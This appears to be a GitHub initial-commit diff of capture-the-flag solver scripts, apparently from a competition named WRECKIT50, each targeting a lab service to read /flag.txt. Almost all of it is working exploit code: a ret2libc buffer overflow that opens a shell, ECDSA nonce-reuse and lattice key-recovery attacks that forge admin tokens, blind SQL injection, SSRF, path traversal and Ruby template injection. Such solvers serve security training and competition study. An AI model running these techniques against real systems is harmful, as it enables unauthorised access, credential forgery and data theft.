Initial commit

This commit is contained in:
Rayhan Hanaputra
2025-10-10 22:18:06 +07:00
committed by GitHub
commit ea02892f14
1246 changed files with 289342 additions and 0 deletions
File diff suppressed because one or more lines are too long
+7
View File
@@ -0,0 +1,7 @@
import requests, urllib
import sys
HOST = sys.argv[1]
PORT = 10000
print(requests.get(f'http://{HOST}:{PORT}/art/' + urllib.parse.quote_plus('#{File.read([47, 102, 108, 97, 103, 46, 116, 120, 116].pack("c*"))}')).text)
+42
View File
@@ -0,0 +1,42 @@
from pwn import *
import sys
context.arch = 'amd64'
HOST = sys.argv[1]
PORT = 22000
def conn():
return remote(HOST, PORT, level='warn')
def main():
global r
r = conn()
r.recvline()
junk = b"A" * (0x40 + 8)
pop_rdi = p64(0x401243)
plt_puts = p64(0x401060)
got_puts = p64(0x403fd8)
main_addr = p64(0x4011a9)
ret = p64(0x40101a)
payload = junk + pop_rdi + got_puts + plt_puts + main_addr
r.sendline(payload)
leak = u64(r.recvline(False).ljust(8,b"\x00"))
libc = leak - 0x84420
system = libc + 0x52290
binsh = libc + 0x1b45bd
# print(f"puts @ {hex(leak)}")
# print(f"system @ {hex(system)}")
# print(f"binsh @ {hex(binsh)}")
payload = junk + ret + pop_rdi + p64(binsh) + p64(system) + main_addr
r.sendline(payload)
r.sendline(b"echo 1337")
r.recvuntil(b"1337")
r.sendline(b"cat /flag.txt")
print(r.recvuntil(b'}').decode().strip())
main()
+131
View File
@@ -0,0 +1,131 @@
#!/usr/bin/env python3
from fastecdsa.curve import Curve
from fastecdsa.point import Point
from base64 import urlsafe_b64decode, urlsafe_b64encode
from zlib import crc32
import requests
import json
import re
import sys
import time
HOST = sys.argv[1]
PORT = 14000
url = f"http://{HOST}:{PORT}"
r = requests.get(f"{url}/params").text
r = r.replace("<pre>", "").replace("</pre>", "")
params = json.loads(r)
# print(params)
C = Curve(
"burvesigner",
params["p"],
params["a"],
params["b"],
params["n"],
params["G"][0],
params["G"][1],
)
G = C.G
Y = Point(params["Y"][0], params["Y"][1], C)
b64p = lambda x: x + b"=" * (-len(x) % 4)
b64u = lambda x: x.rstrip(b"=")
b64e = lambda x: b64u(urlsafe_b64encode(x))
b64d = lambda x: urlsafe_b64decode(b64p(x))
def get_token():
r = requests.post(url, data={"username": "guest", "password": "guest"}).cookies
return r["token"]
token1 = get_token()
token2 = get_token()
# print(token1)
# print(token2)
sig1 = token1.split(".")[1]
sig2 = token2.split(".")[1]
t = 112 // 8
shift_u = pow(2, 112 - 64)
def from_bytes(data):
return int.from_bytes(data, "little")
def to_bytes(num):
return int.to_bytes(num, t, "little")
sig1dec = urlsafe_b64decode(sig1)
arr1 = [sig1dec[t * i : t * (i + 1)] for i in range(3)]
Rx1, Ry1, s1 = map(from_bytes, arr1)
sig2dec = urlsafe_b64decode(sig2)
arr2 = [sig2dec[t * i : t * (i + 1)] for i in range(3)]
Rx2, Ry2, s2 = map(from_bytes, arr2)
R1 = Point(Rx1, Ry1, C)
R2 = Point(Rx2, Ry2, C)
# bf diff
for bf in range(1, 2**20):
diff = bf * shift_u
if R1 + G * diff == R2:
# print(bf, diff)
break
def apa(msg):
return crc32(msg)
def fake_sign(msg, x):
k = 555555
R = k * C.G
s = (apa(msg) - x * R.x) * pow(k, -1, C.q) % C.q
sig = b"".join(map(to_bytes, [R.x, R.y, s]))
return urlsafe_b64encode(sig)
def dup_verify(msg, sig):
assert len(sig) == 4 * t
sig = urlsafe_b64decode(sig)
arr = [sig[t * i : t * (i + 1)] for i in range(3)]
Rx, Ry, s = map(from_bytes, arr)
R = Point(Rx, Ry, C)
return apa(msg) * C.G == s * R + Y * R.x
payload = b64e(
json.dumps(
{"user": "admin", "role": "admin", "exp": int(time.time()) + 300}
).encode()
)
h1 = apa(token1.split(".")[0].encode())
h2 = apa(token2.split(".")[0].encode())
h3 = apa(payload)
k1 = (Rx1 * h2 - Rx1 * s2 * diff - Rx2 * h1) * pow(Rx1 * s2 - s1 * Rx2, -1, C.q) % C.q
priv = (h1 - s1 * k1) * pow(Rx1, -1, C.q) % C.q
sig3 = fake_sign(payload, priv)
# print(k1, priv, to_bytes(priv))
token3 = payload + b"." + sig3
token3 = token3.decode()
# print(token3)
r = requests.get(url, cookies={"token": token3}).text
if "flashes" in r:
print("failed")
exit(1)
flag = re.findall(r'Welcome, admin! (.+)</p>', r)[0]
print(flag)
+23
View File
@@ -0,0 +1,23 @@
k1 = t1 * 2^shift + junk
k2 = (t1 + diff) * 2^shift + junk
k2 - k1 = diff (2^shift)
bf: diff (2^shift)
for bf in range(...):
if R1 + G * bf * (2^shift) == R2:
found
--------------------------------
s1 (k1) = h1 - r1 x
s2 (k1 + diff) = h2 - r2 x
(h1 - s1 k1) / r1 = x
(h2 - s2 k1 - s2 diff) / r2 = x
(h1 - s1 k1) r2 = (h2 - s2 k1 - s2 diff) r1
r2 h1 - r2 s1 k1 = r1 h2 - r1 s2 k1 - r1 s2 diff
r1 s2 k1 - r2 s1 k1 = r1 h2 - r1 s2 diff - r2 h1
k1 (r1 s2 - s1 r2) = r1 h2 - r1 s2 diff - r2 h1
k1 = (r1 h2 - r1 s2 diff - r2 h1) / (r1 s2 - s1 r2)
+7
View File
@@ -0,0 +1,7 @@
import requests
import sys
HOST = sys.argv[1]
PORT = 21000
print(requests.post(f"http://{HOST}:{PORT}/crawlback.php", data={'url': 'file:///flag.txt'}).text)
+30
View File
@@ -0,0 +1,30 @@
import requests, random, string, base64, gzip, zlib, json, sys
HOST = sys.argv[1]
PORT = 16000
def random_string(length):
charset = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.choice(charset) for i in range(length))
def exploit():
sess = requests.Session()
## register
username = random_string(5)
password = random_string(5)
r = sess.post(f"http://{HOST}:{PORT}/auth/register", data={"username":username,"password": password}, allow_redirects=False)
## login
r = sess.post(f"http://{HOST}:{PORT}/auth/login", data={"username":username,"password": password}, allow_redirects=False)
## exploit python
content = {"provider": "python","url":" file:///flag.txt"}
files = {"file": ("visit", b"\x00\x02"+gzip.compress(zlib.compress(json.dumps(content).encode())))}
r = sess.post(f"http://{HOST}:{PORT}/dashboard/fetch_by_file", files=files)
b64_string = r.text
b64_string += "=" * ((4 - len(b64_string) % 4) % 4)
print(base64.b64decode(b64_string).decode())
if __name__ == "__main__":
exploit()
+54
View File
@@ -0,0 +1,54 @@
import requests
HOST = "http://localhost:12000"
def login():
token = requests.post(f"{HOST}/api/login",json={"email":"checker@gemasnotes.id", "password":"uRIqCvJ<IGb;VDT14"}).json()["token"]
return token
def send_request(payload,token):
res = requests.post(f"{HOST}/api/notes/count", data=payload, headers={"Authorization": f"Bearer {token}","Content-Type":"application/json"})
if res.status_code == 401:
new_token = login()
return send_request(payload, new_token)
return res.json()["count"], token
def attack(idx, char):
global token
sql_payload = f"' UNION SELECT IF(ASCII(SUBSTRING((SELECT fl4gg FROM rewards), {idx}, 1)) > {ord(char)},31337,0) ORDER BY 1 DESC#"
final_payload = '{"count_by":"title","keyword":"'+ sql_payload +'","keyword": "hehe"}'
result,token = send_request(final_payload, token)
if result == 31337:
return True
return False
def solve():
charset = "0123456789abcdef"
flag = ""
idx = 10
for i in range(32):
lo = 0
hi = len(charset)
while lo <= hi:
mid = lo + (hi - lo) // 2
char = charset[mid]
if attack(idx,char):
lo = mid + 1
else:
hi = mid - 1
flag += charset[lo]
print(f"CHAR {idx} | {charset[lo]}")
idx += 1
return "WRECKIT50{"+flag+"}"
if __name__=="__main__":
global token
token = login()
flag = solve()
print(flag)
+37
View File
@@ -0,0 +1,37 @@
import requests
HOST = "http://localhost:12000"
def login():
token = requests.post(f"{HOST}/api/login",json={"email":"checker@gemasnotes.id", "password":"uRIqCvJ<IGb;VDT14"}).json()["token"]
return token
def send_request(payload,token):
res = requests.post(f"{HOST}/api/notes/count", data=payload, headers={"Authorization": f"Bearer {token}","Content-Type":"application/json"})
if res.status_code == 401:
new_token = login()
return send_request(payload, new_token)
return res.json()["count"], token
def attack():
token = login()
charset = "0123456789abcdef"
flag = ""
idx = 10
for i in range(32):
for c in list(charset):
sql_payload = f"' UNION SELECT IF(ASCII(SUBSTRING((SELECT fl4gg FROM rewards), {idx}, 1)) = {ord(c)},31337,0) ORDER BY 1 DESC#"
final_payload = '{"count_by":"title","keyword":"'+ sql_payload +'","keyword": "hehe"}'
result,token = send_request(final_payload, token)
if result == 31337:
flag += c
idx += 1
print(f"[+] CHAR {idx} | {c}")
break
return "WRECKIT50{"+flag+"}"
if __name__=="__main__":
flag = attack()
print(flag)
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
from subprocess import check_output
from pwn import *
def execute(payload):
with open("payload", "wb") as f:
f.write(payload)
output = check_output(["./hirnfick", "payload"])[13:]
return output
def enc(s):
final = b""
for c in s:
final += b"+" * c
final += b">"
return final
payload = b"<" * 0x90
payload += b"+" * (0x20)
payload += b">"
payload += b"+" * (0x5e-0x22)
payload += b">"
payload += b"---"
payload += b">" * (0x90-2-0x20)
payload += b"+"
payload += b">" * 0x20
payload += enc(b"cat /flag.txt")
# payload += b".>" * 8
out = execute(payload)
print(hexdump(out))
+85
View File
@@ -0,0 +1,85 @@
import hmac
from base64 import urlsafe_b64encode, urlsafe_b64decode
from hashlib import sha224, sha256, sha384, sha512
from ecdsa import ecdsa, SigningKey, VerifyingKey, NIST256p, NIST224p, NIST384p, NIST521p
allowed_curve = [
NIST224p,
NIST256p,
NIST384p,
NIST521p
]
hashfunc = [
sha224,
sha256,
sha384,
sha512
]
key_size = [28, 32, 48, 66]
signature_size = [56, 64, 96, 132]
class PastaSigner:
def __init__(self, secret: bytes, version: int):
self.purpose = 'public'
if version > 4 or version < 1:
version = 1
self.version = version
self.hashfunc = hashfunc[self.version - 1]
self.key_size = key_size[self.version - 1]
self.priv = SigningKey.from_string(secret[:self.key_size], curve=allowed_curve[self.version - 1])
def serialize(self, data: bytes, sig):
token = 'v' + str(self.version) + '.'
token += self.purpose + '.'
token += urlsafe_b64encode(data + sig).decode().replace('=', '')
return token
def sign(self, data: str):
data = data.encode()
pub = self.priv.get_verifying_key().to_string()
h = self.hashfunc(data + pub).digest()
nonce = hmac.new(self.priv.to_string(), data, self.hashfunc).hexdigest()
sig = self.priv.sign_digest(h, k=int(nonce, 16))
return self.serialize(data + pub, sig)
class PastaVerifier:
def __init__(self, secret):
self.purpose = 'public'
self.secret = secret
def deserialize(self, data: bytes):
try:
version, purpose, payload = data.split(b'.')
version = int(version.replace(b'v', b''))
if version > 4 or version < 1:
return False
self.version = version
self.hashfunc = hashfunc[self.version - 1]
self.key_size = key_size[self.version - 1]
self.priv = SigningKey.from_string(self.secret[:self.key_size], curve=allowed_curve[self.version - 1])
raw_data = urlsafe_b64decode(payload + (b'==' * 2))
size = signature_size[self.version - 1]
signature = raw_data[-size:]
public_key = raw_data[-size * 2:-size]
message = raw_data[:-size]
return message, public_key, signature
except Exception as e:
return False
def verify(self, token: str):
deserialized = self.deserialize(token.encode())
if deserialized:
message, _, signature = deserialized
h = self.hashfunc(message).digest()
verifier = self.priv.get_verifying_key()
return verifier.verify_digest(signature, h)
return False
+129
View File
@@ -0,0 +1,129 @@
import json
import os
import requests
from sage.all import *
from Crypto.Util.number import *
from Crypto.Util.strxor import strxor
from hashlib import sha512
from base64 import urlsafe_b64decode, urlsafe_b64encode
from pasta import PastaSigner, PastaVerifier
HOST = "10.100.101.102:13000"
# HOST = "0.0.0.0:8000"
def register(username):
r = requests.post('http://{}/register'.format(HOST), json={'username': username, 'password': '123'})
print(r.json())
def login(username):
r = requests.post('http://{}/auth?version=4'.format(HOST), json={'username': username, 'password': '123'})
token = r.json()['token']
return token
def get_flag(token):
r = requests.get('http://{}/flag'.format(HOST), headers={'Authorization': 'Bearer {}'.format(token)})
return r.json()
secret = b'\x00' + os.urandom(65)
signer = PastaSigner(secret, 4)
verifier = PastaVerifier(secret)
sigs = []
n = 110
for i in range(n):
username = "pasta-{}".format(i)
register(username)
token = login(username)
sigs.append(token.encode())
# sigs.append(signer.sign(json.dumps({"username": username, "role": "user"})).encode())
hs = []
rs = []
ss = []
for i in range(n):
_, _, sig = sigs[i].split(b".")
raw_data = urlsafe_b64decode(sig + (b'==' * 2))
size = 132
signature = raw_data[-size:]
public_key = raw_data[-size * 2:-size]
message = raw_data[:-size]
r = bytes_to_long(signature[:66])
s = bytes_to_long(signature[66:])
hs.append(bytes_to_long(sha512(message).digest()))
rs.append(r)
ss.append(s)
h1 = int(hs[0])
r1 = int(rs[0])
s1 = int(ss[0])
captured = []
for i in range(len(hs)):
captured.append((int(hs[i]), int(rs[i]), int(ss[i])))
order = 0x01fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffa51868783bf2f966b7fcc0148f709a5d03bb5c9b8899c47aebb6fb71e91386409
matrix = []
nonce_bit = 512 # bit size of nonce
i = 0
n = len(captured) + 2
max_nonce = 2**nonce_bit
for signature in captured:
matrix.append([0] * n)
matrix[i][i] = order
i += 1
matrix.append([0] * n)
matrix.append([0] * n)
i = 0
for signature in captured:
h, r, s = signature
inv_s = inverse_mod(s, order)
matrix[n - 2][i] = r * inv_s
matrix[n - 1][i] = h * inv_s
i += 1
matrix[n - 2][n - 2] = int(max_nonce) / order
matrix[n - 2][n - 1] = 0
matrix[n - 1][n - 2] = 0
matrix[n - 1][n - 1] = max_nonce
print("LLL")
B = Matrix(QQ, n, n, matrix)
L = B.LLL()
possible_d = []
for row in list(L):
k1 = int(abs(row[0]))
if k1 != 0 and k1 != max_nonce and k1 < max_nonce:
d = (k1 * s1 - h1) * inverse_mod(r1, order) % order
possible_d.append('00' + long_to_bytes(d).hex())
# assert secret.hex() in possible_d
for d in possible_d:
fake_signer = PastaSigner(bytes.fromhex(d), 4)
token = fake_signer.sign(json.dumps({"username": "pwned", "role": "admin"}))
print(get_flag(token))
+7
View File
@@ -0,0 +1,7 @@
import requests
import sys
HOST = sys.argv[1]
PORT = 20000
print(requests.get(f"http://{HOST}:{PORT}/download?filename=/flag.txt").text)
+1
View File
@@ -0,0 +1 @@
/flag.txt
+6
View File
@@ -0,0 +1,6 @@
import requests
url = f'http://localhost:11000?type=file'
files = {'file': open('path', 'rb').read()}
r = requests.post(url, files=files, timeout=5)
print(r.json())